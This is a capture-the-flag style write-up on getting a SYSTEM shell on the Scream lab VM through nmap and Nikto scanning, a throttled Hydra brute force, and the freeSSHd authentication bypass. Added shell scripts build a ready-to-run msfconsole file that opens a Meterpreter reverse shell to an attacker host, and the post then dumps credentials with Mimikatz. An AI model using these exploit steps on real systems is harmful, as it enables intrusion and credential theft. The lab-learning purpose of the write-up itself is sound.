This post contains the steps to get a root (SYSTEM) shell on the Scream VM.
Ok, let's do this write-up!
As always, we need to discover where the machine is on our network. To do so, let’s use Nmap:
After getting the IP address (192.168.1.2), we need to do some fingerprinting.
Fig. Nmap scan result
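The discovery and fingerprinting steps, as an added example that is not part of the original write-up: the two nmap runs (ping sweep, then full service scan) plus a small triage filter over nmap's greppable output that pulls out the banners the rest of the post acts on. The subnet (192.168.1.0/24), the output file names and the sample report are assumptions; only the target IP and the two banners come from the post.

```shell
#!/bin/sh
# Added example (not part of the original write-up): the two nmap runs the
# post describes (ping sweep, then full service fingerprinting) and a small
# triage filter over nmap's greppable output that picks out the banners the
# post acts on (War-ftpd on 21, WeOnlyDo sshd on 22).
# Assumes the 192.168.1.0/24 range and the 192.168.1.2 target from the post.

# Step 1: find the VM, then fingerprint every TCP port on it, saving
# greppable (-oG) and normal (-oN) output. Network calls, not run below.
scan_target() {
    subnet="$1"; target="$2"
    nmap -sn "$subnet"
    nmap -sV -sC -p- -oG scream.gnmap -oN scream.nmap "$target"
}

# Step 2: read a -oG report on stdin and print "port service version" for
# each open port. A Ports: entry has the layout
#   port/state/proto/owner/service/rpcinfo/version/
open_services() {
    awk '
        /Ports:/ {
            line = $0
            sub(/^.*Ports: /, "", line)
            sub(/[ \t]+Ignored State:.*$/, "", line)
            n = split(line, entries, ", ")
            for (i = 1; i <= n; i++) {
                split(entries[i], f, "/")
                if (f[2] != "open") continue
                version = (f[7] == "") ? "-" : f[7]
                printf "%s %s %s\n", f[1], f[5], version
            }
        }'
}

# Step 3: flag the banners worth a second look. War-ftpd is the server that
# blacklisted the author; WeOnlyDo sshd is the freeSSHd banner that led to
# the authentication-bypass module.
flag_banners() {
    open_services | grep -iE 'war-?ftpd|WeOnlyDo'
}

# Constructed -oG sample (not the post's real scan output); the banners on
# 21 and 22 are the ones the write-up reports, port 80 is the Nikto target,
# the filtered 445 entry is there only to exercise the state filter.
SAMPLE_GNMAP=$(printf '%s\n%s\t%s\n%s\t%s\t%s\n' \
    '# Nmap scan report (constructed sample)' \
    'Host: 192.168.1.2 ()' 'Status: Up' \
    'Host: 192.168.1.2 ()' \
    'Ports: 21/open/tcp//ftp//War-ftpd 1.65/, 22/open/tcp//ssh//WeOnlyDo sshd 2.1.3 (protocol 2.0)/, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///' \
    'Ignored State: closed (65531)')

# Prints the two flagged services from the constructed sample.
printf '%s\n' "$SAMPLE_GNMAP" | flag_banners
```

On a real run, pipe `scream.gnmap` into `flag_banners` instead of the sample; the watchlist regex is the place to add other banners you want surfaced first.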
Since the scan report showed port 80 open, I scanned it with Nikto.
Fig. Nikto report on port 80 (HTTP)
There was no interesting file nor any 'obvious' vulnerability.
Then I started checking the FTP server, because its banner was "War-ftpd". I logged in as the anonymous user, but after a while I got blacklisted.
I guess the FTP server didn't appreciate my attempts to exploit War-ftpd flaws while I was trying to crack the FTP account with Hydra.
And I got banned. (Lesson for next time: a service that blacklists noisy clients calls for a throttled Hydra run, fewer parallel tasks with -t and a pause between attempts with -W, not a full-speed brute force.)
Fig. Time-out of the FTP connection after getting blacklisted
Then the last attempt was the SSH server, with the curious banner "WeOnlyDo sshd 2.1.3". Hmm, this custom banner was interesting: WeOnlyDo is the vendor of the wodSSHServer component that freeSSHd is built on, so the banner points straight at freeSSHd.
I decided to go further with the SSH service.
I started browsing the internet for sshd vulnerabilities on the Windows platform. Then I found: the freeSSHd Authentication Bypass Metasploit module (exploit/windows/ssh/freesshd_authbypass, CVE-2012-6066). freeSSHd up to 1.2.6 accepts a public-key authentication request without checking the key, so the module needs nothing more than a valid username.
Fig. Looking for a freeSSHd exploit
I decided to check it out. I knew there was an account called ftp, but that username didn't work.
Fig. Setting the payload for the freeSSHd exploit
So I decided to brute-force the logins using the username list shipped with Metasploit.
And... it worked!
Fig. Successful exploitation with the freeSSHd exploit
Thanks to this vulnerability, I got a Meterpreter session with SYSTEM privileges, so there was no privilege escalation left to do. Awesome!
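The exploitation steps above (module, payload, username list), written down once as a msfconsole resource script, as an added example that is not part of the original write-up. Assumptions: the module name exploit/windows/ssh/freesshd_authbypass and its USER_FILE option, the path of Metasploit's unix_users.txt wordlist, an attacker IP of 192.168.1.10 and the resource-file location; the target IP is the one from the post.

```shell
#!/bin/sh
# Added example (not from the original write-up): generate a msfconsole
# resource script for the freeSSHd authentication-bypass step, so the
# RHOST / payload / username-list settings are written down once instead of
# typed interactively, and check it for missing values before running it.
# Assumes the module name exploit/windows/ssh/freesshd_authbypass and its
# USER_FILE option, the 192.168.1.2 target from the post, and a reachable
# attacker IP (LHOST) of 192.168.1.10.

# Emit the resource script on stdout.
#   $1 target (RHOST), $2 attacker IP (LHOST), $3 username wordlist
write_freesshd_rc() {
    target="$1"; lhost="$2"; userfile="$3"
    cat <<EOF
use exploit/windows/ssh/freesshd_authbypass
set RHOST $target
set RPORT 22
# the bypass only needs a valid username, so the module walks this list
set USER_FILE $userfile
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
exploit -j
EOF
}

# Sanity check before handing the file to msfconsole -r: every option we
# rely on must be set to a non-empty value (an empty LHOST is the classic
# way to get a "successful" exploit and no session). Returns 0 when the
# file is complete, 1 plus the missing option names otherwise.
rc_complete() {
    rcfile="$1"; rc=0
    for opt in RHOST USER_FILE PAYLOAD LHOST; do
        if ! grep -Eq "^set $opt [^[:space:]]+" "$rcfile"; then
            echo "missing: $opt"; rc=1
        fi
    done
    return $rc
}

# Usage with the assumed paths (wordlist location assumed; it is the
# unix_users.txt list that ships with Metasploit).
TMP_RC="${TMPDIR:-/tmp}/freesshd.rc"
write_freesshd_rc 192.168.1.2 192.168.1.10 \
    /usr/share/metasploit-framework/data/wordlists/unix_users.txt > "$TMP_RC"
rc_complete "$TMP_RC" && echo "run with: msfconsole -q -r $TMP_RC"
```

Run the generated file with `msfconsole -q -r /tmp/freesshd.rc`. Once a session opens, the credential dump from the next section is `load kiwi` followed by `creds_all` inside Meterpreter (kiwi replaced the older `load mimikatz` extension).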
We had a SYSTEM session, but I was curious and wanted to practice with Mimikatz, a (security) tool developed by a French guy (Benjamin Delpy) who did some awesome work. In a few words, it lets you dump the passwords that Windows keeps in memory (in the LSASS process), which is why it needs the SYSTEM-level session we just got.
Combined with our Meterpreter session, we were able to load Mimikatz and get the password: thisisaverylongpassword. And yes, it is.
Fig. Dumping passwords using Mimikatz
This was the first Windows VM I've tried here, and it was a great surprise. I learnt a few tricks, and that was nice.
Hope you liked it, and good evening!